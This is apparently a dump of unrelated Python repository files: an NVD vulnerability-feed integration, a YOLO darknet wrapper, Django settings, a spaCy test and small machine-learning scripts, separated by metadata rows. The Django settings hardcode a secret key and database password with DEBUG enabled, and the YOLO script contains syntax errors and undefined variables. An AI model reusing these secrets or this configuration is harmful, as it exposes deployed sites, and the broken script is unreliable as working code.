fields['cvss3'] = cvss_v3_data
fields['cvssvector'] = cvss_v3.get('vectorString')
fields['cvss'] = all_cvss
return fields
def extract_titles(data_item={}) -> list:
titles = []
for title in data_item.get('titles'):
titles.append(title.get('title'))
return titles
def extract_descriptions(data_item={}) -> list:
descriptions = []
for description in data_item.get('cve', {}).get('description', {}).get('description_data'):
descriptions.append(description.get('value'))
return descriptions
# ========================================== Generic Query ===============================================#
def test_module(client: BaseClient, params: Dict[str, Any]):
api_key = params.get('apiKey')
try:
params = {
"cveId": "CVE-2020-22120"
}
if api_key:
params['apiKey'] = api_key
res = client._http_request('GET', full_url='https://services.nvd.nist.gov/rest/json/cpes/1.0', params=params)
if "error" in res:
return_error((res.get('error')))
elif "resultsPerPage" in res:
return_results('ok')
except Exception as err:
raise DemistoException(err)
def fetch_indicators_command(client, params):
command = demisto.command()
api_key = params.get('apiKey')
get_type = params.get('type')
cpe_match_string = params.get('cpeMatchString')
cpe_keyword = params.get('keyword')
include_deprecated = params.get('deprecated')
cvss_v2_metrics = params.get('cvssV2Metrics')
cvss_v2_severity = params.get('cvssV2Severity')
cvss_v3_metrics = params.get('cvssV3Metrics')
cvss_v3_severity = params.get('cvssV3Severity')
history = int(params.get('history'))
exceeds_span = True
urls = {
"CPE": "/rest/json/cpes/1.0/",
"CVE": "/rest/json/cves/1.0/"
}
url = urls[get_type]
now = datetime.utcnow()
startIndex = 0
resultsPerPage = 2000
data_items = []
indicators: List[Dict] = []
last_run_data = demisto.getLastRun()
run_times: List[datetime] = []
run_limit = 9
# If there is no last run date, use the history specified in the params
if "lastRun" not in last_run_data or command == 'nvd-get-indicators':
last_run = (now - timedelta(days=history))
else:
last_run = dateparser.parse(last_run_data.get('lastRun')) # type: ignore
modStartDate = last_run
modEndDate = now
# API calls can only span 120 days, so we should loop if the history
# parameter is greater than this
while exceeds_span and modEndDate and modStartDate:
delta = (modEndDate - modStartDate).days
if delta > 120:
modEndDate = modStartDate + timedelta(days=120)
else:
exceeds_span = False
params = {
"modStartDate": modStartDate.strftime(DATE_FORMAT),
"modEndDate": modEndDate.strftime(DATE_FORMAT),
"startIndex": startIndex,
"resultsPerPage": resultsPerPage
}
if api_key:
params['apiKey'] = api_key
run_limit = 99
if get_type == "CPE":
params['addOns'] = "cves"
if include_deprecated:
params['includeDeprecated'] = include_deprecated
if get_type == "CVE":
if cvss_v2_metrics:
params['cvssV2Metrics'] = cvss_v2_metrics
if cvss_v2_severity:
params['cvssV2Severity'] = cvss_v2_severity
if cvss_v3_metrics:
params['cvssV3Metrics'] = cvss_v3_metrics
if cvss_v3_severity:
params['cvssV3Severity'] = cvss_v3_severity
if cpe_match_string:
params['cpeMatchString'] = cpe_match_string
if cpe_keyword:
params['keyword'] = cpe_keyword
total_results = 1
collection_count = 0
# Collect all the indicators together
while collection_count < total_results:
# Check to ensure no rate limits are hit
if len(run_times) == run_limit:
first_time = run_times[0]
last_time = run_times[(run_limit - 1)]
if (last_time - first_time).seconds <= 60:
demisto.info("Rate limit hit, sleeping for 3 seconds")
# We sleep 3 seconds to avoid hitting any rate limits
sleep(3)
del run_times[0]
run_times.append(datetime.utcnow())
res = client._http_request('GET', url, params=params, timeout=300)
# Check to see if there are any errors
if "error" in res:
return_error(res.get('error'))
total_results = res.get('totalResults', 0)
resultsPerPage = res.get('resultsPerPage', 0)
result = res.get('result')
if result:
if get_type == 'CPE':
data_items += result.get('cpes')
else:
data_items += result.get('CVE_Items')
params['startIndex'] += resultsPerPage
collection_count += resultsPerPage
modStartDate = modEndDate
modEndDate = now
# If this is nvd-get-indicators command:
if command == 'nvd-get-indicators':
# If they are CPEs
if get_type == 'CPE':
outputs = [
{
"cpe23Uri": x.get('cpe23Uri'),
"titles": ". ".join(extract_titles(data_item=x)),
"vulnerabilities": ", ".join(x.get('vulnerabilities'))
} for x in data_items
]
command_results = CommandResults(
outputs_prefix='CPE',
outputs_key_field='cpe23Uri',
outputs=data_items,
readable_output=tableToMarkdown("National Vulnerability Database CPEs:", outputs)
)
# If they are CVEs
elif get_type == 'CVE':
outputs = [
{
"id": x.get('cve').get('CVE_data_meta').get('ID'),
"description": ". ".join(extract_descriptions(data_item=x))
}
for x in data_items]
command_results = CommandResults(
outputs_prefix='CVE',
outputs_key_field='id',
outputs=data_items,
readable_output=tableToMarkdown("National Vulnerability Database CVEs:", outputs)
)
return_results(command_results)
# Else if this is fetch-indicators
elif command == 'fetch-indicators':
indicators = []
# If they are CPEs
if get_type == 'CPE' and data_items:
for item in data_items:
item['type'] = "CPE"
indicator = {
"value": item.get('cpe23Uri'),
"rawJSON": item
}
# This is reserved for future use
if "vulnerabilities" in item:
relationships = []
for vulnerability in item.get('vulnerabilities', []):
relationship = EntityRelationship(
name=EntityRelationship.Relationships.RELATED_TO,
entity_a=item.get('cpe23Uri'),
entity_a_family="Indicator",
entity_a_type="CPE",
entity_b=vulnerability,
entity_b_family="Indicator",
entity_b_type="CVE"
)
relationships.append(relationship.to_indicator())
indicator['relationships'] = relationships
indicators.append(indicator)
# If they are CVEs
elif get_type == 'CVE' and data_items:
for item in data_items:
item['type'] = "CVE"
fields: Dict = parse_cve_data(item)
indicators.append({
"value": item.get('cve', {}).get('CVE_data_meta', {}).get('ID'),
"type": FeedIndicatorType.CVE,
"fields": fields,
"rawJSON": item
})
# Create the indicators in a batch, 2000 at a time
for b in batch(indicators, batch_size=2000):
demisto.createIndicators(b)
# Set new integration context
demisto.setLastRun({"lastRun": now.isoformat()})
# =========================================== Built-In Queries ===========================================#
''' MAIN FUNCTION '''
# COMMAND CONSTANTS
commands = {
'test-module': test_module,
'fetch-indicators': fetch_indicators_command,
'nvd-get-indicators': fetch_indicators_command
}
def main() -> None:
params = demisto.params()
base_url = "https://services.nvd.nist.gov"
verify_cert = not params.get('insecure', False)
proxy = params.get('proxy', False)
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
client = BaseClient(
base_url=base_url,
verify=verify_cert,
proxy=proxy,
)
commands[command](client, params)
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {command} command.\nError: {str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| [
"[email protected]"
] | |
7f611c84c8e4bd5fbd87fdfe6e15165d7275e17f | f7bdda5ce6026e30f8d2258499d066cec0a9bf6a | /detect_object.py | 03a40e8e061ac0b96d172f6b950f5f922d728bb4 | [] | no_license | AbhishekBose/yolo_docker | cfb3e3fe3dda8092771f614bdd9ce3ea022435e1 | 1377a73b38a95cfdde37ddc215a6f90ecbd407b0 | refs/heads/master | 2022-06-25T21:14:51.702133 | 2019-12-15T15:30:19 | 2019-12-15T15:30:19 | 228,206,788 | 10 | 10 | null | 2022-06-01T20:54:18 | 2019-12-15T15:29:53 | Python | UTF-8 | Python | false | false | 5,336 | py | #%%
from ctypes import *
import random
import argparse
import os
import traceback
import cv2
import functools
import numpy as np
import time
import sys
import imutils
#%%
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
libdarknet_path = os.path.join("/home/darknet/libdarknet.so")
lib = CDLL(libdarknet_path, RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE]
predict_image.restype = POINTER(c_float)
def classify(net, meta, im):
out = predict_image(net, im)
res = []
for i in range(meta.classes):
res.append((meta.names[i], out[i]))
res = sorted(res, key=lambda x: -x[1])
return res
def array_to_image(arr):
# need to return old values to avoid python freeing memory
arr = arr.transpose(2,0,1)
c, h, w = arr.shape[0:3]
arr = np.ascontiguousarray(arr.flat, dtype=np.float32) / 255.0
data = arr.ctypes.data_as(POINTER(c_float))
im = IMAGE(w,h,c,data)
return im, arr
def netdetect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
im, image = array_to_image(image)
rgbgr_image(im)
num = c_int(0)
pnum = pointer(num)
predict_image(net, im)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
a = dets[j].prob[0:meta.classes]
if any(a):
ai = np.array(a).nonzero()[0]
for i in ai:
b = dets[j].bbox
res.append((meta.names[i], dets[j].prob[i], (max(b.x,0), max(b.y,0), max(b.w,0), max(b.h,0))))
res = sorted(res, key=lambda x: -x[1])
if isinstance(image,bytes): free_image(im)
free_detections(dets, num)
return res
#%%
def convert_yolo_normal(x,y,w,h,s1,s2):
b0=(2*x-w)/2
b1=w+b0
b2=(2*y-h)/2
b3=h+b2
return (int(b0),int(b1),int(b2),int(b3))
#%%
if __name__ == "__main__":
config_file = 'object_detector.config'
with open('config.json') as f:
data = json.load(f)
weights_file = data['weights_file']
cfg_file = data['cfg_file']
obj_data = data['obj_file']
image_name = sys.argv[1]
img = cv2.imread(image_name)
netdet = load_net(cfg_file,weights_file,0)
metadet = load_meta(obj_data)
obj_res = netdetect(netlp,metalp, veh,0.7)
for obj_res:
print('All detected objects are:: ')
for i in range(len(obj_res)):
print(obj_res[i][0])
| [
"[email protected]"
] | |
129e029f51e6c808b38cbff8b551f38366f41e0c | 0726e305f3a7b57e8837ddcd334148ec68e9d2de | /portfolio/settings.py | 79f45073c3745b1bc73328e6685fcf08e83d4536 | [
"MIT"
] | permissive | Brian23-eng/portfolio-1 | 873448172532c0dd82de496911ad509022189db1 | 70ec48288fadf803a166f70728adfb1a61916a6d | refs/heads/master | 2022-09-24T21:26:13.670066 | 2020-01-23T05:36:20 | 2020-01-23T05:36:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,673 | py | """
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 3.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import django_heroku
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y#k96$zi!2uc9@tj#bvr0smlxx1v)2dcff447#%=kwn)$4(*1i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'portfolio.myportfolio',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'portfolio',
'USER': 'moringa',
'PASSWORD': 'p@$$w0rd',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# configuring the location for media
MEDIA_URL = '/project_images/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'project_images')
# Configure Django app for Heroku
django_heroku.settings(locals()) | [
"[email protected]"
] | |
953b813584667bf1bd1e285fa7bdb8d4caa9ffa5 | 9bb18febdfc911a88756afd9490526f8e7929bfc | /spacy/tests/regression/test_issue3951.py | f9912c494ec18b830006793bd039c8ffa525a4cc | [
"MIT"
] | permissive | ashaffer/spaCy | 3c28c7c8422fd4072bd3d472e796994d3269cf9f | ec0beccaf13eef263feec27e820136ad1e270bd4 | refs/heads/master | 2020-07-05T23:42:00.467234 | 2019-08-16T16:39:25 | 2019-08-16T16:39:25 | 202,819,156 | 1 | 0 | MIT | 2019-08-17T01:06:11 | 2019-08-17T01:06:10 | null | UTF-8 | Python | false | false | 585 | py | # coding: utf8
from __future__ import unicode_literals
import pytest
from spacy.matcher import Matcher
from spacy.tokens import Doc
@pytest.mark.xfail
def test_issue3951(en_vocab):
"""Test that combinations of optional rules are matched correctly."""
matcher = Matcher(en_vocab)
pattern = [
{"LOWER": "hello"},
{"LOWER": "this", "OP": "?"},
{"OP": "?"},
{"LOWER": "world"},
]
matcher.add("TEST", None, pattern)
doc = Doc(en_vocab, words=["Hello", "my", "new", "world"])
matches = matcher(doc)
assert len(matches) == 0
| [
"[email protected]"
] | |
de5ec83749603d84453db9285e68d7d64b0f4369 | 8edd63a42469bf09fcad1c1070995ceda6e49646 | /env/lib/python2.7/site-packages/observations/r/phosphate.py | 6977f1f13f9f2bdb88341269c503dcf9123103b4 | [] | no_license | silky/bell-ppls | fa0b5418f40dab59de48b7220ff30caba5945b56 | 369e7602c810b694a70ac1e875017480c8910ac8 | refs/heads/master | 2020-04-06T08:40:28.588492 | 2018-11-01T06:51:33 | 2018-11-01T06:51:33 | 157,312,221 | 1 | 0 | null | 2018-11-13T03:04:18 | 2018-11-13T03:04:18 | null | UTF-8 | Python | false | false | 1,835 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def phosphate(path):
"""Phosphate Level Data
Plasma inorganic phosphate levels from 33 subjects.
A data frame with 33 observations on the following 9 variables.
`group`
a factor with levels `control` and `obese`.
`t0`
baseline phosphate level
,
`t0.5`
phosphate level after 1/2 an hour.
`t1`
phosphate level after one an hour.
`t1.5`
phosphate level after 1 1/2 hours.
`t2`
phosphate level after two hours.
`t3`
phosphate level after three hours.
`t4`
phosphate level after four hours.
`t5`
phosphate level after five hours.
C. S. Davis (2002), *Statistical Methods for the Analysis of Repeated
Measurements*, Springer, New York.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `phosphate.csv`.
Returns:
Tuple of np.ndarray `x_train` with 33 rows and 9 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'phosphate.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/HSAUR/phosphate.csv'
maybe_download_and_extract(path, url,
save_file_name='phosphate.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
| [
"[email protected]"
] | |
c733d23c52b223a95360a77acfa2c1924f9cc877 | 9433ce01c6e2906c694b6f0956a4640e1872d4d2 | /src/main/python/wdbd/codepool/numpy/np_ployfit.py | 7f5cd81f4002e97e948a3b8be95f2be36410229a | [] | no_license | shwdbd/python_codepool | fcd7950fc1339994186461ae18c34cee238938ee | 92a4fb61d060f9a545499b6b7f99a4dc211d5009 | refs/heads/master | 2023-02-20T19:49:23.677824 | 2022-06-15T08:53:51 | 2022-06-15T08:53:51 | 209,431,254 | 0 | 1 | null | 2023-02-15T21:58:53 | 2019-09-19T00:56:03 | Python | UTF-8 | Python | false | false | 344 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : np_ployfit.py
@Time : 2019/11/06 14:24:55
@Author : Jeffrey Wang
@Version : 1.0
@Contact : [email protected]
@Desc : 拟合函数
1. fit_1z 一阶函数拟合
2. fit_2z 二阶函数拟合
? 如何评价拟合效果
'''
# here put the import lib
| [
"[email protected]"
] | |
4f933506f4af1143b9acc28db9a09d38ec4467de | 4eab0329e5bf8b91e3305eaf9202de107cfe889b | /notebooks/data8_notebooks/lab04/tests/q2_3.py | bd02b5e36213b04e7d67c069acfcddca70a09933 | [
"MIT",
"BSD-3-Clause"
] | permissive | y1ngyang/jupyterhub_AWS_deployment | e638f489ad1b70962204f4355eb2a7c4fc97dc7d | 8172d63d94894774ec29f427ab5eeec637c923f4 | refs/heads/master | 2023-04-15T16:00:11.948307 | 2018-05-18T20:16:37 | 2018-05-18T20:16:37 | 134,009,971 | 0 | 0 | BSD-3-Clause | 2023-04-04T00:27:55 | 2018-05-18T22:33:34 | Jupyter Notebook | UTF-8 | Python | false | false | 375 | py | test = {
'name': '',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> disemvowel("Datascience rules!") == "Dtscnc rls!"
True
""",
'hidden': False,
'locked': False
},
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"[email protected]"
] | |
46d07128a604bf41698eb408598644429535db5b | 77e8b7bc211624687eb61fdb071020642b2c0080 | /machinelearning/f16.py | 843de75f00d51c7741c5309feaa61e2e095f6c40 | [] | no_license | wherby/hackerrank | fab46ea208042ce8055c2755545896bf69f88895 | 84345f56690ea6b1d5db181b12d2a2669007456c | refs/heads/master | 2020-09-26T23:53:06.841052 | 2019-09-15T12:11:43 | 2019-09-15T12:11:43 | 67,225,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,412 | py | import numpy as np
from math import sqrt
import matplotlib.pyplot as plt
import warnings
from matplotlib import style
from collections import Counter
style.use('fivethirtyeight')
dataset ={'k': [[1,2],[2,3],[3,1]], 'r': [[6,5], [7,7,],[8,6]]}
new_feature = [5,7]
# for i in dataset:
# for ii in dataset[i]:
# plt.scatter(ii[0],ii[1],s =100, color =i)
# [[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset]
# plt.scatter(new_feature[0], new_feature[1])
# plt.show()
def k_nearest_neighbors(data, predict, k =3):
if len(data) >=k:
warnings.warn('k is set to value less than totoal voting groups')
distances = []
for group in data:
for features in data[group]:
#euclidean_distance = np.sqrt(np.sum((np.array(features) - np.array(predict)) **2))
euclidean_distance = np.linalg.norm(np.array(features) - np.array(predict))
distances.append([euclidean_distance, group])
votes = [ i[1] for i in sorted(distances)[:k]]
#print(sorted(distances))
#print( Counter(votes).most_common(1))
vote_result = Counter(votes).most_common(1)[0][0]
return vote_result
result = k_nearest_neighbors(dataset, new_feature , k =3)
print result
[[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset]
plt.scatter(new_feature[0], new_feature[1],color = result)
plt.show() | [
"[email protected]"
] | |
b20ca1afe34ac874e9dd05a205c75d038f6ea7b0 | 1ae03694e6826c2c3224647024f66debcebd62dc | /matlab/+robust_andrews_kernel/balance_scale/metrics.py | d78e052129030ea9de8d3552ad6679f6790d35df | [
"Apache-2.0"
] | permissive | Joaggi/Robust-kernels-for-robust-location-estimation | 5ad7f8f3be9a08e5d4283e03e017e5e3b9b186b8 | 9db62273de90547c982d819dc45e66ac86bfcb58 | refs/heads/master | 2023-04-17T22:41:01.652426 | 2022-08-02T23:43:31 | 2022-08-02T23:43:31 | 27,465,913 | 3 | 1 | null | 2022-08-02T23:39:44 | 2014-12-03T02:49:24 | MATLAB | UTF-8 | Python | false | false | 686 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 16 15:50:05 2014
@author: Alejandro
"""
import scipy.io as sio
import os, sys
lib_path = os.path.abspath('G:/Dropbox/Universidad/Machine Learning')
sys.path.append(lib_path)
import numpy as np
import Algorithms.Python.Metrics as Metrics
import Robustes.Experiments.metrics_over_labels as metrics_over_labels
dictionary = {
'Kernelconvexnmf':0,
'KernelKMeans':0,
'Kernelseminmfnnls':0,
'Kernelseminmfrule':0,
'KMeans':0,
'NNMF':0,
'RMNMF':1
}
labels_name = 'balance-scale-labels'
metrics_over_labels.metrics('G:/Dropbox/Universidad/Machine Learning/Robustes/BalanceScale/',dictionary,labels_name) | [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.